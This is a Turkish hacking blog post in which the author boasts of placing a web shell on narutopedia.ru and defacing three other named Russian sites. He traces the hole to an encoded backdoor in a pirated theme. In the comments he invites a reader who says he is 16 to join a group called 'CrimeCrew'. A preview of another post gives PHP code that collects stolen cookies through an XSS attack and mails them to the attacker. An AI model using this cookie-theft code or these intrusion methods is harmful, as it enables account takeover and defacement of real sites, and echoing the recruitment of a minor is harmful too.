Target:http://narutopedia.ru ( Warez' in sonu)

-
Ilk hikaye bu rus anime fanlarina yaptığım saldırıya ait..
Target:http://narutopedia.ru (Media Wiki)

Bu web sitesi dikkatimi nasıl çekti. Hatırlamıyorum fakat Acunetix Web Vuln Scanner ile taradigimda sitede kaynağını belirlemekte zorlandığım bir çeşit upload açığı ile karşılaştım. Siteye shell attım ve sunucuda ki diğer 3 siteyede index attım. Bu ana sayfaya hacklendi yazmak demek. Ancak sitedeki upload açığının kaynağını bulmakta kararliydim. Sitenin scriptini çektim ve inceleye aldım. Notepad++ ile inceledigimde theme içinde encode edilmiş bir koda  rastladım. Decoder ile şifreyi kirdigimda bu kodun uzak sunucudan upload.php adında bi kodu siteye inject ettiğini farkettim. Aynı zamanda bu upload.php  nin konumunu uzak sunucuda bir txt içine yazdiriyordu. Biraz arastirdigimda warez temaların içinde bu tip zararlı kodlar olduğunu öğrendim. Muhtemelen narutopedia.ru'nun sahibi warez tema kullanıyordu. Ve bu tema onun hacklenmesine sebep verdi.

+Narutofans.ru
+Necrologs.ru
+Narutopedia.ru
Hacklenmisti..

Yorumlar

  1. Unknown3 Şubat 2016 06:06

    ilginç miş.

    YanıtlaSil
  2. Unknown4 Şubat 2016 13:07

    beni eğit abi :-D

    YanıtlaSil
    Yanıtlar
    1. Faraday4 Şubat 2016 17:07

      Elimden geldiğince çok yazı yayınlamaya çalışıyorum..
      CrimeCrew e katılmayı kabul edersen sana yol göstermeye çalışabilirim..

      Sil
    2. Unknown4 Şubat 2016 23:19

      Abi çok teşşekkür ederim tabi katılmak isterim yaşım 16 bi sorun olurmu.

      Sil
    3. Unknown5 Şubat 2016 11:35

      Sana danışmam gereken bazı konular var tecrübelisin doğru yönlendirirsin

      Sil
  3. Unknown6 Şubat 2016 04:06

    Gmail hesabın varsa ordan konuşalımmı facebook kullanmıyorum.

    YanıtlaSil
    Yanıtlar
    1. Faraday8 Şubat 2016 17:54

      Gmail adresini verirsen sana mail alabilirim..

      Sil

Yorum Gönder

Bu blogdaki popüler yayınlar

XSS Cookie Çalma

-
Selamın Aleykün Uzun Soluklu anlatımlara Tekrardan dewam Ediyorum.. Bloguma sıradan bir okuyucu olarak giriş yaptığımda makalelerin çok kısa ve anlaşılmaz olduğunu farkettim.. Not defteride öyledir değilmi sadece yazan anlasa yeterli olur.. Ancak okuyucu Faktörünü Göz Önüne Alarak yazmaya dewam edeceğim inşşallah.. Şimdi sizinle beraber bir site kuracağız.. Bu site saldırımızda bize yardımcı olacak.. Ben sitenin adını Taşıyıcı koymak istiyorum.. Çünkü site cookie bilgilerini bize taşımakla görevli.. Sitemizin adı:[ http://Tasiyici.com ] Bu gerçek bir domain değil anlaşılır olması adına bu ismi kullanıyorum.. Umarım daha önce web sitesi kurmuşsunuzdur.. Çünkü o konuya girersek işin içinden çıkamayız.. Ben direkt olarak php kodunu vereceğim.. <php? $cookie = $_GET[’data’]; $kime = "Buraya Mail Adresimiz yazılacak.."; $konu = "cookie"; mail ($kime,$konu,$cookie); ?> Bu kodlar php kodlarıdır.. Bilgisayarınızda çalışmazlar.. Bunları bir web
Devamı

Adli Bilişim Programları

-
Evet Arkadaşlar yeni Bir Yazı İle Karşınızdayım.. Bu Yazıda Konu Bir Sistemi Hacklemek yada sistemden Veri Sızdırmak Deil.. Hacker Olmak istiyoruz değil mi.. Bu İşte Kararlıyız.. En Baştan söyleyeyim bu İş çook tehlikelidir.. Bir Anda Kapı Çalınır.. Açarsın Polis.. Adını? Sorarlar.. Benim Dersin.. Tutuklusunuz Derler.. Afallarsın.. Bilgisayarına El Koyarlar.. Ne Oluyo Yaw.. Dersin.. Seni Emniyette Memnun edeceklerini söylerler.. Hiç bir soruya tatmin edici bir cevap vermezler.. Dahası Küfrederler.. Telefonuna El Koyarlar.. Şimdi dersiniz ki ne anlatıyo bu.. Hangi Film.. Film deil arkadaşlar.. İş ciddi.. Dolandırıcılıklar.. Hırsızlıklar Artık Bilgisayar Üzerinden Gayet Kolay yapılabiliyor.. Kim mi Yapıyor.. Hackerlar.. Bilgisayar Dehaları.. Ve Bazende Benim gibi Bilgisayar Sapıkları.. Hackerlar Ve Bilgisayar Dehaları Zaten Çook Akıllı Oldukları İçin yakalanmayacak stratejiler Kullanırlar.. Benim Gibilerse biraz Daha Geç İdrak Eder.. Kullanıcı Bilgilerini..
Devamı

FTK Imager yazılımı kullanılarak image almak

-
Resim
-== GİRİŞ ==- Image Almak Ne demektir ? Image ingilizcede resim anlamına gelmektedir. Ancak adli bilişim penceresinden bakarsak bunun faklı bir anlamı vardır. Kelime bu anlamı ilk anlamından ötürü kazanmış olabilir. Adli Bilişim Dijital Delillerin incelenmesini ve korunmasını konu alan yeni bir disiplindir. Filmlerde olay yeri inceleme ekiplerinin olay mahaline vardıklarında kurban'nın ve olay yerinin detaylı fotoğraflarını çektiklerini görmüşüzdür. Bunu olay yerini yada kurbanı daha sonra bozulmadan inceleme fırsatı bulabilmek için yaparlar. Çünkü kendileri olay mahâlinden ayrıldıktan sonra bir takım deliller zamana bağlı olarak zarar görebileceği gibi birileri tarafındanda karartılabilir. Aynı olasılıklar dijital deliller içinde geçerlidir. Bu nedenle olay mahaline varıldığında kurbanın yada failin,(fotoğrafını çektiğiniz sırada bunu bilemeyebilirsiniz) (her iki durumda da zanlının(aslında zanlıya ait olan depolama aygıtının)) fotoğrafını çekmeniz gerekir. Bu
Devamı